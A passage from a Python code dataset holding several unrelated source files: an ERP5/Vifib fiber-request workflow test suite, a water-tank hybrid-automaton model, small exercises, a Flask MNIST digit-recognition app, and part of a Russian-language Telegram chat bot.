python_script = sc_wf.get(\"updateContentMd5\")\n python_script.manage_proxy(roles=[\"Manager\"]) \n\n def modifyFiberRequestState(self,transition_name,sequence,fiber_request=None):\n \"\"\"\n Calls the workflow for the fiber request\n \"\"\" \n if fiber_request is None:\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n #Do the workflow action\n fiber_request.portal_workflow.doActionFor(fiber_request, transition_name) \n\n def stepSetFiberSkin(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Change current Skin\n \"\"\"\n request = self.app.REQUEST\n self.getPortal().portal_skins.changeSkin(\"Fiber\")\n request.set('portal_skin', \"Fiber\")\n\n def stepCallNewFiberRequestDialog(self, sequence=None, sequence_list=None, **kw):\n \"\"\"Check access to the new free fiber request dialog\"\"\"\n self.portal.WebSection_viewNewFreeFiberRequestDialog()\n\n def stepCreateFiberRequest(self, sequence=None, sequence_list=None, **kw):\n \"\"\"Create a free fiber request\"\"\"\n\n #Create new request\n self.portal.WebSection_newFreeFiberRequest(\n dialog_id=\"WebSection_viewNewFreeFiberRequestDialog\",\n first_name=\"Test\", \n last_name=\"Vifib\", \n address_city=\"Cloud\", \n address_street_address=\"First\", \n address_zip_code=0000, \n default_birthplace_address_city=\"Nexedi\", \n default_email_text=\"test.toto@vifib.test\", \n internet_service_provider=\"Free\", \n start_date=DateTime(), \n telephone_text=\"0320707288\")\n \n def stepFindPendingFiberRequest(self, sequence=None, sequence_list=None, **kw):\n \"\"\"Find pending request in sequence like in the workflow list\"\"\"\n\n pending_request_list = self.portal.portal_catalog(\n validation_state=\"pending\",\n portal_type=\"Free Fiber Request\",\n title=\"Test Vifib\",\n sort_on=[('creation_date','descending')])\n\n #Set the last fiber request in the sequence\n self.assertTrue(len(pending_request_list) > 0)\n fiber_request = pending_request_list[0]\n sequence.edit(fiber_request_url=fiber_request.getRelativeUrl())\n\n def stepStartFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Start the fiber request present in sequence\"\"\"\n\n 
fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"start_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'started') \n\n def stepConfirmFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Confirm the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n fiber_request.setGender(\"mister\")\n self.modifyFiberRequestState(\"confirm_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'confirmed') \n\n def stepRefuseFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Refuse the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"refuse_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'refused') \n\n def stepRetractFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Retract the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"retract_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'retracted') \n\n def stepContactFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Contact the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"contact_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'contacted') \n\n def stepAcceptFiberRequest(self,sequence=None,sequence_list=None, **kw):\n \"\"\"Accept the fiber request present in sequence\"\"\"\n fiber_request_url = sequence.get(\"fiber_request_url\")\n fiber_request = self.getPortal().restrictedTraverse(fiber_request_url)\n\n self.modifyFiberRequestState(\"accept_action\",sequence,fiber_request)\n self.assertEquals(fiber_request.getValidationState(), 'accepted') \n\n @skip('Not maintained')\n def test_01_AnonymousCanCreateFiberRequest(self):\n \"\"\"Anonymous Fiber Request creation\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCallNewFiberRequestDialog \\\n stepCreateFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_02_ManagerFindPendingFiberRequest(self):\n \"\"\"Search request in pending list\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_03_StaffCanConfirmPendingRequest(self):\n \"\"\"Check confirmation of pending request\"\"\" \n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n '\n sequence_list.addSequenceString(sequence_string)\n 
sequence_list.play(self)\n\n\n @skip('Not maintained')\n def test_04_StaffCanRefusePendingRequest(self):\n \"\"\"Check we can refuse instead of confirm a request\"\"\" \n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepRefuseFiberRequest \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_05_StaffCanContactConfirmedRequest(self):\n \"\"\"Next the confirmation, we cantact the person\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepContactFiberRequest \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n\n @skip('Not maintained')\n def test_06_StaffCanRetractConfirmedRequest(self):\n \"\"\"Instead of contact a person, we can retract the request\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepRetractFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_07_StaffCanAcceptContactedRequest(self):\n \"\"\"Contact was successfull, we accept the request\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepContactFiberRequest \\\n stepAcceptFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_08_StaffCanRetractContactedRequest(self):\n \"\"\"Cantact was unsuccessfull, we retract the request\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepContactFiberRequest \\\n stepRetractFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n @skip('Not maintained')\n def test_09_StaffCanRetractAcceptedRequest(self):\n \"\"\"After accept a request, we are able to retract us.\"\"\"\n sequence_list = SequenceList()\n sequence_string = 'stepSetFiberSkin \\\n stepLogout \\\n stepCreateFiberRequest \\\n stepTic \\\n stepLoginAsManager \\\n stepFindPendingFiberRequest \\\n stepConfirmFiberRequest \\\n stepContactFiberRequest \\\n stepAcceptFiberRequest \\\n stepRetractFiberRequest \\\n stepTic \\\n '\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n\nclass TestVifibFiberSecurityRules(testVifibSecurityMixin):\n \"\"\"Test if security rules are correctly set\"\"\"\n\n @skip('Test must be written')\n def test_01_AnonymousCanAccessPublishedWebPage(self):\n pass\n\ndef test_suite():\n \"\"\"Define tests may be run\"\"\"\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestVifibFiberSubscription))\n suite.addTest(unittest.makeSuite(TestVifibFiberSecurityRules))\n\n return 
suite\n","sub_path":"master/product/Vifib/tests/testVifibFiber.py","file_name":"testVifibFiber.py","file_ext":"py","file_size_in_byte":13442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"308956326","text":"# The water-tank example coded in Python\n\n\nimport macropy.activate\nfrom language import *\nfrom gen import *\nfrom sympy import *\nimport shac\n\n# This is the Raskin model of the waterTank example\n# K = 0.075 heating rate in t4, h = 150.\n\node1 = Ode(sympify(\"diff(x(t))-(0.075*(150-x(t)))\"), sympify(\"x(t)\"), 20, {})\node2 = Ode(sympify(\"diff(x(t))\"), sympify(\"x(t)\"), 100, {})\node3 = Ode(sympify(\"diff(x(t))+(0.075*x(t))\"), sympify(\"x(t)\"), 100, {})\node4 = Ode(sympify(\"diff(x(t))\"), sympify(\"x(t)\"), 20, {})\n\n# The locations of the hybrid automaton\nt1 = Loc(\"t1\", [ode1], [],\n {S(\"x(t)\"): [Guard(S(\"x>=20\")), Guard(S(\"x < 100\"))]})\nt2 = Loc(\"t2\", [ode2], [],\n {S(\"x(t)\"): [Guard(S(\"x>=100\")), Guard(S(\"x <= 100\"))]})\nt3 = Loc(\"t3\", [ode3], [],\n {S(\"x(t)\"): [Guard(S(\"x>20\")), Guard(S(\"x <= 100\"))]})\nt4 = Loc(\"t4\", [ode4], [],\n {S(\"x(t)\"): [Guard(S(\"x>=20\")), Guard(S(\"x <= 20\"))]})\n\n# The edges\ne1 = Edge('t1', 't2', {S(\"x(t)\"): [Guard(S(\"x>=100\")),\n Guard(S(\"x <= 100\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [])\ne2 = Edge('t2', 't3', {S(\"x(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"OFF\")])\ne3 = Edge('t1', 't3', {S(\"x(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"OFF\")])\ne4 = Edge('t3', 't1', {S(\"x(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"ON\")])\ne5 = Edge('t3', 't4', {S(\"x(t)\"): [Guard(S(\"x>=20\")),\n Guard(S(\"x <= 20\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [])\ne6 = Edge('t4', 't1', {S(\"x(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update2(Symbol('x'), Symbol('x'))],\n [Event(\"ON\")])\n\nwatertank = Ha(\"watertank\", [t1, t2, t3, t4], t4,\n [e1, e2, e3, e4, e5, e6], [], [])\n\n# Compile\n# shac.compile(watertank)\n","sub_path":"examples/TSE2015/Piha/watertank&burnerSAturationExample/watertank.py","file_name":"watertank.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"457616498","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n ans = \"\"\n size1, size2 = len(a), len(b) # 假设a较短\n if size1 > size2:\n return self.addBinary(b, a)\n carry = 0\n for i in range(size1-1,-1,-1): # 处理ab中对应位置的元素\n ans = str((carry + int(a[i]) + int(b[size2 -size1 + i]))%2) + ans\n\n if carry + int(a[i]) + int(b[size2 -size1 + i]) >= 2:\n carry = 1\n else:\n carry = 0\n\n for j in range(size2 - size1 -1, -1 ,-1): # 处理较长字符串中的剩余元素\n ans = str((int(b[j]) + carry) %2) + ans\n if carry + int(b[j]) == 2:\n carry = 1\n else:\n carry = 0\n\n if carry == 1:\n ans = \"1\" + ans\n\n return ans\n\nprint(Solution().addBinary(\"100\",\"110010\"))\n\n","sub_path":"字符串/67. 二进制求和.py","file_name":"67. 
二进制求和.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227964507","text":"import numpy as np\n\ndef sigmoid(x):\n s = 1/(1 + np.exp(-x))\n return s\n\ndef sigmoid_derivative(x):\n s = sigmoid(x)\n ds = s * (1 - s)\n return ds\n\nxv = np.array([1, 2, 3])\nprint(sigmoid_derivative(xv))","sub_path":"week2assignment1.2.py","file_name":"week2assignment1.2.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"408767647","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask\nfrom flask import request\nfrom flask import render_template\n\nimport PIL\nimport base64\nimport numpy as np\nfrom PIL import Image\nfrom io import BytesIO\nfrom time import sleep\n\nimport tensorflow as tf\nimport tflearn\n\napp = Flask(__name__, static_url_path='/static')\n\n\ndef build_model():\n tf.reset_default_graph()\n net = tflearn.input_data([None, 784])\n\n net = tflearn.fully_connected(net, 300, activation='ReLU')\n net = tflearn.fully_connected(net, 100, activation='ReLU')\n\n net = tflearn.fully_connected(net, 10, activation='softmax')\n\n net = tflearn.regression(net, optimizer='sgd', learning_rate=0.05, loss='categorical_crossentropy')\n\n model = tflearn.DNN(net)\n return model\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef home():\n resp = None\n if request.method == 'POST':\n data = request.form['canvas']\n data = base64.b64decode(data.replace('data:image/png;base64,', ''))\n img = Image.open(BytesIO(data))\n img = fill_background(img)\n img = resize(img, 28)\n X = do_array(img)\n X = X.reshape(784)\n # import pdb; pdb.set_trace()\n try:\n sleep(1)\n model = build_model()\n sleep(1)\n model.load('../MNIST.tfl')\n y = model.predict([X])\n resp = get_answer(y)\n except:\n resp = None\n return render_template('teste.html', resposta=resp)\n\n\ndef resize(img, width):\n wpercent = (width / float(img.size[0]))\n hsize = int((float(img.size[1]) * float(wpercent)))\n img = img.resize((width, hsize), PIL.Image.ANTIALIAS)\n return img\n\n\ndef do_array(img):\n temp = img\n temp = temp.convert('1')\n A = np.array(temp)\n new_A = np.empty((A.shape[0], A.shape[1]), None)\n\n for i in range(len(A)):\n for j in range(len(A[i])):\n if A[i][j] == True:\n new_A[i][j] = 0\n else:\n new_A[i][j] = 1\n return new_A\n\n\ndef fill_background(image):\n image.convert(\"RGBA\")\n pixel_data = image.load()\n\n if image.mode == \"RGBA\":\n for y in range(image.size[1]):\n for x in range(image.size[0]):\n if pixel_data[x, y][3] < 255:\n pixel_data[x, y] = (255, 255, 255, 255)\n return image\n\n\ndef get_answer(y):\n best = max(y[0])\n return y[0].index(best)\n","sub_path":"MNIST/webapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"156588051","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\nimport io\nimport logging\nimport os\nimport random\nimport re\nimport requests\nfrom requests.exceptions import ConnectionError\nfrom requests.exceptions import ReadTimeout\nimport sys\nimport threading\nimport time\n\n# сторонние модули\nimport pyowm\nimport telebot\nimport wikipedia\n\n# модуль с настройками\nimport data\n# модуль с токенами\nimport tokens\n\nmy_bot = telebot.TeleBot(tokens.bot, threaded=False)\n\nglobal weather_bold\nweather_bold = False\n\nglobal kek_counter\nkek_counter = 0\nglobal 
kek_bang\nglobal kek_crunch\n\nif sys.version[0] == '2':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n\n\ndef user_action_log(message, text):\n print(\"{0}\\nUser {1} {2}\\n\".format(time.strftime(data.time, time.gmtime()), message.from_user.id, text))\n\n\n# приветствуем нового юзера /task-ом\n@my_bot.message_handler(content_types=['new_chat_member'])\ndef welcomingTask(message):\n '''\n path = data.dir_location_task\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n while (not rand_img.startswith(\"1\")):\n rand_img = random.choice(all_imgs)\n rand_img = random.choice(all_imgs)\n your_img = open(path+rand_img, \"rb\")\n my_bot.send_message(message.chat.id, 'Добро пожаловать в чат мехмата.\\nДокажи нам, что ты достоин — реши такую задачку:')\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n print(\"{0}\\nWelcoming message with this task:\\n{1}\\n\".format(time.strftime(data.time, time.gmtime()), your_img.name))\n your_img.close()\n '''\n file = open(data.file_location_rules, 'r')\n my_bot.send_message(message.chat.id, file.read(), parse_mode=\"HTML\", disable_web_page_preview=True,\n reply_to_message_id=message.message_id)\n file.close()\n\n\n# команды /start, /help, /links, /wifi, /chats\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in (\n '/start', '/start@algebrach_bot', '/help', '/help@algebrach_bot', '/links', '/links@algebrach_bot', '/wifi',\n '/wifi@algebrach_bot', '/chats', '/chats@algebrach_bot', '/rules', '/rules@algebrach_bot'))\ndef myData(message):\n command = message.text.lower().split()[0]\n if command.startswith('/start'):\n file_name = data.file_location_start\n user_action_log(message, \"started using the bot\")\n elif command.startswith('/help'):\n file_name = data.file_location_help\n user_action_log(message, \"looked for help\")\n elif command.startswith('/links'):\n file_name = data.file_location_links\n user_action_log(message, \"requested Mechmath links\")\n elif command.startswith('/wifi'):\n file_name = data.file_location_wifi\n user_action_log(message, \"requested the Wi-Fi list\")\n elif command.startswith('/chats'):\n file_name = data.file_location_chats\n user_action_log(message, \"requested chats list\")\n elif command.startswith('/rules'):\n file_name = data.file_location_rules\n user_action_log(message, \"requested rules list\")\n else:\n return\n with open(file_name, 'r') as file:\n my_bot.reply_to(message, file.read(), parse_mode=\"HTML\", disable_web_page_preview=True)\n file.close()\n\n\n# команды /task и /maths\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in (\n '/task', '/task@algebrach_bot', '/maths', '/maths@algebrach_bot'))\n# идёт в соответствующую папку и посылает рандомную картинку\ndef myRandImg(message):\n for command in str(message.text).lower().split():\n if command.startswith('/task'):\n path = data.dir_location_task\n user_action_log(message, \"asked for a challenge\")\n if not len(message.text.split()) == 1:\n your_difficulty = ' '.join(message.text.split(' ')[1:])\n if your_difficulty in data.difficulty:\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n while not rand_img.startswith(your_difficulty):\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message,\n \"chose a difficulty level '{0}' and got that image:\\n{1}\".format(your_difficulty,\n 
your_img.name))\n your_img.close()\n else:\n my_bot.reply_to(message,\n \"Доступно только три уровня сложности:\\n{0}\\nВыбираю рандомную задачу:\".format(\n data.difficulty))\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message,\n \"chose a non-existent difficuly level '{0}' and got that image:\\n{1}\".format(\n your_difficulty, your_img.name))\n your_img.close()\n else:\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message, \"got that image:\\n{0}\".format(your_img.name))\n your_img.close()\n elif command.startswith('/maths'):\n path = data.dir_location_maths\n user_action_log(message, \"asked for maths.\")\n if not len(message.text.split()) == 1:\n your_subject = ' '.join(message.text.split(' ')[1:]).lower()\n if your_subject in data.subjects:\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n while not rand_img.startswith(your_subject):\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message,\n \"chose subject '{0}' and got that image:\\n{1}\".format(your_subject, your_img.name))\n your_img.close()\n else:\n my_bot.reply_to(message,\n \"На данный момент доступны факты только по следующим предметам:\\n{0}\\nВыбираю рандомный факт:\".format(\n data.subjects))\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message,\n \"chose a non-existent subject '{0}' and got that image:\\n{1}\".format(your_subject,\n your_img.name))\n your_img.close()\n else:\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message, \"got that image:\\n{0}\".format(your_img.name))\n your_img.close()\n\n\n# команда /d6\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ('/d6', '/d6@algebrach_bot'))\n# рандомно выбирает элементы из списка значков\n# TODO: желательно найти способ их увеличить или заменить на ASCII арт\ndef myD6(message):\n d6 = data.d6_symbols\n dice = 2\n roll_sum = 0\n symbols = ''\n for command in str(message.text).lower().split():\n if not len(message.text.split()) == 1:\n dice = ' '.join(message.text.split(' ')[1:])\n try:\n dice = int(dice)\n except ValueError:\n my_bot.reply_to(message,\n \"Не понял число костей. 
Пожалуйста, введи команду в виде \\'/d6 \\', где — целое от 1 до 10.\")\n return\n if 0 < dice <= 10:\n max_result = dice * 6\n for count in range(dice):\n roll_index = random.randint(0, len(d6) - 1)\n roll_sum += roll_index + 1\n if count < dice - 1:\n symbols += '{0} + '.format(d6[roll_index])\n elif count == dice - 1:\n symbols += '{0} = {1} ({2})'.format(d6[roll_index], roll_sum, max_result)\n my_bot.reply_to(message, symbols)\n user_action_log(message, \"got that D6 output: {0}\".format(symbols))\n\n\n# команда /roll\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ('/roll', '/roll@algebrach_bot'))\n# генерует случайное целое число, в засимости от него может кинуть картинку или гифку\ndef myRoll(message):\n rolled_number = random.randint(0, 100)\n my_bot.reply_to(message, str(rolled_number).zfill(2))\n user_action_log(message, \"recieved {0}.\\n\".format(rolled_number))\n\n\n# команда /truth\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/truth', '/truth@algebrach_bot'])\ndef myTruth(message):\n # открывает файл и отвечает пользователю рандомными строками из него\n the_TRUTH = random.randint(1, 1000)\n if not the_TRUTH == 666:\n file_TRUTH = open(data.file_location_truth, 'r')\n TRUTH = random.choice(file_TRUTH.readlines())\n my_bot.reply_to(message, str(TRUTH).replace(\"
\", \"\\n\"))\n file_TRUTH.close()\n user_action_log(message, \"has discovered the Truth:\\n{0}\".format(str(TRUTH).replace(\"
\", \"\\n\")))\n else:\n my_bot.reply_to(message, data.the_TRUTH, parse_mode=\"HTML\")\n user_action_log(message, \"has discovered the Ultimate Truth.\")\n\n\n# команда /gender\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/gender', '/gender@algebrach_bot'])\ndef myGender(message):\n # открывает файл и отвечает пользователю рандомными строками из него\n file_gender = open(data.file_location_gender, 'r')\n gender = random.choice(file_gender.readlines())\n my_bot.reply_to(message, str(gender).replace(\"
\", \"\\n\"))\n file_gender.close()\n user_action_log(message, \"has discovered his gender:\\n{0}\".format(str(gender).replace(\"
\", \"\\n\")))\n\n\n# команда /wolfram (/wf)\n@my_bot.message_handler(\n func=lambda message: message.text.lower().split()[0] in ['/wolfram', '/wolfram@algebrach_bot', '/wf'])\ndef wolframSolver(message):\n # обрабатывает запрос и посылает пользователю картинку с результатом в случае удачи\n wolfram_query = []\n # сканируем и передаём всё, что ввёл пользователь после '/wolfram ' или '/wf '\n # TODO: inline\n if not len(message.text.split()) == 1:\n your_query = ' '.join(message.text.split(' ')[1:])\n user_action_log(message, \"entered this query for /wolfram:\\n{0}\".format(your_query))\n response = requests.get(\"https://api.wolframalpha.com/v1/simple?appid=\" + tokens.wolfram,\n params={'i': your_query})\n # если всё хорошо, и запрос найден\n if response.status_code == 200:\n img_wolfram = io.BytesIO(response.content)\n my_bot.send_photo(message.chat.id, img_wolfram, reply_to_message_id=message.message_id)\n user_action_log(message, \"has received this Wolfram output:\\n{0}\".format(response.url))\n # если всё плохо\n else:\n my_bot.reply_to(message,\n \"Запрос не найдён.\\nЕсли ты ввёл его на русском, то попробуй ввести его на английском.\")\n user_action_log(message, \"didn't received any data\")\n # если пользователь вызвал /wolfram без аргумента\n else:\n my_bot.reply_to(message,\n \"Я не понял запрос.\\nДля вызова Wolfram вводи команду в виде \\'/wolfram <запрос>\\' или \\'/wf <запрос>\\'.\")\n user_action_log(message, \"called /wolfram without any arguments\")\n\n\n# команда /weather\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/weather', '/weather@algebrach_bot'])\n# получает погоду в Москве на сегодня и на три ближайших дня, пересылает пользователю\ndef myWeather(message):\n global weather_bold\n my_OWM = pyowm.OWM(tokens.owm)\n # где мы хотим узнать погоду\n my_obs = my_OWM.weather_at_place('Moscow')\n w = my_obs.get_weather()\n # статус погоды сейчас\n status = w.get_detailed_status()\n # температура сейчас\n temp_now = w.get_temperature('celsius')\n # limit=4, т.к. 
первый результат — текущая погода\n my_forecast = my_OWM.daily_forecast('Moscow,RU', limit=4)\n my_fc = my_forecast.get_forecast()\n # температуры на следующие три дня\n my_fc_temps = []\n # статусы на следующие три дня\n my_fc_statuses = []\n for wth in my_fc:\n my_fc_temps.append(str(wth.get_temperature('celsius')['day']))\n my_fc_statuses.append(str(wth.get_status()))\n # если вызвать /weather из кека\n if weather_bold:\n my_bot.send_message(message.chat.id, data.weather_HAARP, parse_mode=\"HTML\")\n weather_bold = False\n user_action_log(message, \"got HAARP'd\")\n # если всё нормально, то выводим результаты\n else:\n my_bot.reply_to(message,\n \"The current temperature in Moscow is {2} C, and it is {3}.\\n\\nTomorrow it will be {4} C, {5}.\\nIn 2 days it will be {6}, {7}.\\nIn 3 days it will be {8} C, {9}.\\n\\n\".format(\n time.strftime(data.time, time.gmtime()), message.from_user.id, temp_now['temp'], status,\n my_fc_temps[1], my_fc_statuses[1], my_fc_temps[2], my_fc_statuses[2], my_fc_temps[3],\n my_fc_statuses[3]))\n user_action_log(message,\n \"got that weather forecast:\\nThe current temperature in Moscow is {0} C, and it is {1}.\\nTomorrow it will be {2} C, {3}.\\nIn 2 days it will be {4}, {5}.\\nIn 3 days it will be {6} C, {7}\".format(\n temp_now['temp'], status, my_fc_temps[1], my_fc_statuses[1], my_fc_temps[2],\n my_fc_statuses[2], my_fc_temps[3], my_fc_statuses[3]))\n\n\n# команда /wiki\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/wiki', '/wiki@algebrach_bot'])\n# обрабатывает запрос и пересылает результат, или выдаёт рандомный факт в случае отсутствия запроса\ndef myWiki(message):\n wiki_query = []\n # обрабатываем всё, что пользователь ввёл после '/wiki '\n if not len(message.text.split()) == 1:\n your_query = ' '.join(message.text.split(' ')[1:])\n user_action_log(message, \"entered this query for /wiki:\\n{0}\".format(your_query))\n try:\n # по умолчанию ставим поиск в английской версии\n wikipedia.set_lang(\"en\")\n # если в запросе имеется хоть один символ не с латинским ASCII, ищем в русской версии\n for s in your_query:\n if ord(s) > 127:\n wikipedia.set_lang(\"ru\")\n break\n # извлекаем первые 7 предложений найденной статьи\n wiki_response = wikipedia.summary(your_query, sentences=7)\n # извлекаем ссылку на саму статью\n wiki_url = wikipedia.page(your_query).url\n # извлекаем название статьи\n wiki_title = wikipedia.page(your_query).title\n my_bot.reply_to(message, \"{0}.\\n{1}\\n\\n{2}\".format(wiki_title, wiki_response, wiki_url),\n parse_mode=\"HTML\")\n # всё плохо, ничего не нашли\n except wikipedia.exceptions.PageError:\n my_bot.reply_to(message, \"Запрос не найден.\")\n # нашли несколько статей, предлагаем пользователю список\n except wikipedia.exceptions.DisambiguationError as ex:\n wiki_options = ex.options\n my_bot.reply_to(message,\n \"Пожалуйста, уточни запрос. 
Выбери, что из перечисленного имелось в виду, и вызови /wiki ещё раз.\\n\" + \"\\n\".join(\n map(str, wiki_options)))\n # берём рандомную статью на рандомном языке (перечисляем языки в data.py)\n else:\n wikipedia.set_lang(random.choice(data.wiki_langs))\n try:\n wikp = wikipedia.random(pages=1)\n wikpd = wikipedia.page(wikp)\n wikiFact = wikipedia.summary(wikp, sentences=3)\n my_bot.reply_to(message, \"{0}.\\n{1}\".format(wikpd.title, wikiFact), parse_mode=\"HTML\")\n except wikipedia.exceptions.DisambiguationError:\n wikp = wikipedia.random(pages=1)\n wikiVar = wikipedia.search(wikp, results=1)\n print(\"There are multiple possible pages for that article.\\n\")\n wikpd = wikipedia.page(str(wikiVar[0]))\n wikiFact = wikipedia.summary(wikiVar, sentences=4)\n my_bot.reply_to(message, \"{0}.\\n{1}\".format(wikp, wikiFact), parse_mode=\"HTML\")\n user_action_log(message, \"got Wikipedia article\\n{0}\".format(str(wikp)))\n\n\n# команда /meme (выпиливаем?)\n@my_bot.message_handler(commands=['meme'])\n# открывает соответствующую папку и кидает из не рандомную картинку или гифку\ndef myMemes(message):\n all_imgs = os.listdir(data.dir_location_meme)\n rand_file = random.choice(all_imgs)\n your_file = open(data.dir_location_meme + rand_file, \"rb\")\n if rand_file.endswith(\".gif\"):\n my_bot.send_document(message.chat.id, your_file, 